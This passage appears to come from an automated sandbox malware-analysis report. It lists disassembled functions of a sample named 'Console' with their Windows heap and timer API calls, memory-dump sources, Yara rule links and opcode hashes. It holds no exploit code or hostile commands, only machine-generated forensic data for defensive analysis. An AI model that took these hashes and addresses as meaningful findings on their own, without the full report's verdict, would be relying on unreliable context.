                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012B9E61
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012B9F04
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012B9F4A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 608d14262a797931d7a816f135e0a13376868ccaf44b9a62d832f0a0947e1433
                                                                                                                                                                                                                          • Instruction ID: bf1f3127ee11545912d4009a5bc8589850683ee3bb942855e55add6d2a8c1506
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 608d14262a797931d7a816f135e0a13376868ccaf44b9a62d832f0a0947e1433
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BE150B1A1011A9FDF25CF24DC80BE9B7B8AF29344F0441E9EA49A7251E7709ED4CF90
                                                                                                                                                                                                                          Function 012C50D0 Relevance: 9.4, APIs: 5, Strings: 1, Instructions: 368memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C5421
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C54C4
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C550A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: cede0bf4b16587cb4cd38743977a7aa2d0cf0724bd59f56f6f2dd4f7289e6616
                                                                                                                                                                                                                          • Instruction ID: 37f256711c486fd64e31edd1c2053918368506e73829fa9a26067a60cd80e542
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cede0bf4b16587cb4cd38743977a7aa2d0cf0724bd59f56f6f2dd4f7289e6616
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4E18171A1011A9FDB35CF24DC81BE9B7B9AF24704F4442EDEA49A7241E770AE94CF90
                                                                                                                                                                                                                          Function 012BA4E0 Relevance: 9.4, APIs: 5, Strings: 1, Instructions: 368memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BA831
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BA8D4
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BA91A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 52e2685eba87ec8cdd019276de95d12ba2d88b79e753ef82fa5fe7378c6cac03
                                                                                                                                                                                                                          • Instruction ID: c9e5328ecabe995787de251f7da73c89a77ed43a5edff28bc32f53f7b1ff0041
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52e2685eba87ec8cdd019276de95d12ba2d88b79e753ef82fa5fe7378c6cac03
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2E18275A1011A9FDB35CF24CC81BE9B7B8AF28344F0541E9DA49A7241E770AED5CF90
                                                                                                                                                                                                                          Function 012C5AA0 Relevance: 9.4, APIs: 5, Strings: 1, Instructions: 368memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C5DF1
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C5E94
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C5EDA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 8354c82f8eb22c68d8d0bf78b004a71a56cdd38c949819e69313209f805e579f
                                                                                                                                                                                                                          • Instruction ID: 1d8c6262efbacf1aefc3cbb6fe7bc9123dc13398ac665c97badf9e0f23fdca0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8354c82f8eb22c68d8d0bf78b004a71a56cdd38c949819e69313209f805e579f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70E19471A1021A9FDB35CF24CC80BE9B7B8AF15704F4442EDEA49A7241E770AE95CF90
                                                                                                                                                                                                                          Function 012BF2D0 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 266memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF442
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF4D5
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF50D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF5D3
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF5F0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 0e889b2388884cc7931a96f49465a25a5d813da784189b77898db97ed40fb029
                                                                                                                                                                                                                          • Instruction ID: e058dd7e2bed60e75acba08492387c20dfcfc8e8a89ae863baffb846614c9a3e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e889b2388884cc7931a96f49465a25a5d813da784189b77898db97ed40fb029
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11A17E75E102099BDB21CF79DD90BDEBBB8EF14340F14416AEA09EB252EB309955CF90
                                                                                                                                                                                                                          Function 012C8360 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 262memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C84D2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C8565
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C859D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C8659
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C8676
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: a2d8474e0848c02bd0907c6ead319268554c68c82059b385b08926e13ec4ee3c
                                                                                                                                                                                                                          • Instruction ID: 0534e928a9a03f4dc3c99a9303715dce314d2ee190d8d6fda1e73ab24927f4f6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2d8474e0848c02bd0907c6ead319268554c68c82059b385b08926e13ec4ee3c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EA1C271E102199FDB20CF74DC54BEEBBB8EF14640F15826EEA09AB241E7309955CF90
                                                                                                                                                                                                                          Function 012BF610 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 262memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF782
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF815
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF84D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF909
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF926
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 9a5f3861d64e870d183d7d5eb52e858033b8fe91a831487ded5397bdc3730dba
                                                                                                                                                                                                                          • Instruction ID: a427987a5e6669647ea2be108512f2e196e71ae77f1e385e6fdb5c68c1ca4213
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a5f3861d64e870d183d7d5eb52e858033b8fe91a831487ded5397bdc3730dba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFA1D171E102199FDB20CBB8DD90BDEBBB8EF15740F14416AE909EB252EB309954CF90
                                                                                                                                                                                                                          Function 012C86A0 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 262memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C8812
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C88A5
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C88DD
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C8999
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C89B6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 068594b48adf0f5d81c9beb06e608f13e0d492ad96b3bf7910214ffa0bfa15ec
                                                                                                                                                                                                                          • Instruction ID: 77647a5795476b6e06116099520223586f6c27cac2462330f24e1253b2720e63
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 068594b48adf0f5d81c9beb06e608f13e0d492ad96b3bf7910214ffa0bfa15ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2A1B375E102199FDB21CB74DC54BEEBBB8AF15A00F14822DEA09AB351EB309954CF90
                                                                                                                                                                                                                          Function 012D4810 Relevance: 9.2, APIs: 6, Instructions: 245memorytimeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000004,?,?,?,?,?,00000000,00000000,?), ref: 012D482E
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000050,00000000,00000000,?,?,00000004,?,?,?,?,?,00000000,00000000,?), ref: 012D4846
                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000), ref: 012D4908
                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 012D4920
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000), ref: 012D4942
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000008,00000000), ref: 012D495F
                                                                                                                                                                                                                            • Part of subcall function 012D2AC0: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 012D2B08
                                                                                                                                                                                                                            • Part of subcall function 012D2AC0: HeapAlloc.KERNEL32(03BF0000,00000000,00000070,00000000,00000000,00000000), ref: 012D2B20
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcess$Time$CounterFilePerformanceQuerySystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3212095148-0
                                                                                                                                                                                                                          • Opcode ID: 68f8f732a6114bbb589ae86f9538bada0bc0278856af2b9b983cb9d8eb21b8ae
                                                                                                                                                                                                                          • Instruction ID: 56ff9d582feeb7ddc4346b84edcc649d945fe06674fb0ac37cc96ca95c92a038
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68f8f732a6114bbb589ae86f9538bada0bc0278856af2b9b983cb9d8eb21b8ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F91BF71A102568FDB24EF69D880BAA7BE4FF58700F154569EE09EB754EB30EC00CB90
                                                                                                                                                                                                                          Function 012D60B0 Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 242memorystringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,E8833124,00000105,00000003,00000000,7CAB6A82,00000000), ref: 012D61AA
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,E8833124,00000105,00000003,00000000,7CAB6A82,00000000), ref: 012D6203
                                                                                                                                                                                                                          • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,E8833124,00008585), ref: 012D6313
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000000), ref: 012D6364
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0150E144,7CAB6A82,00000000), ref: 012D6383
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
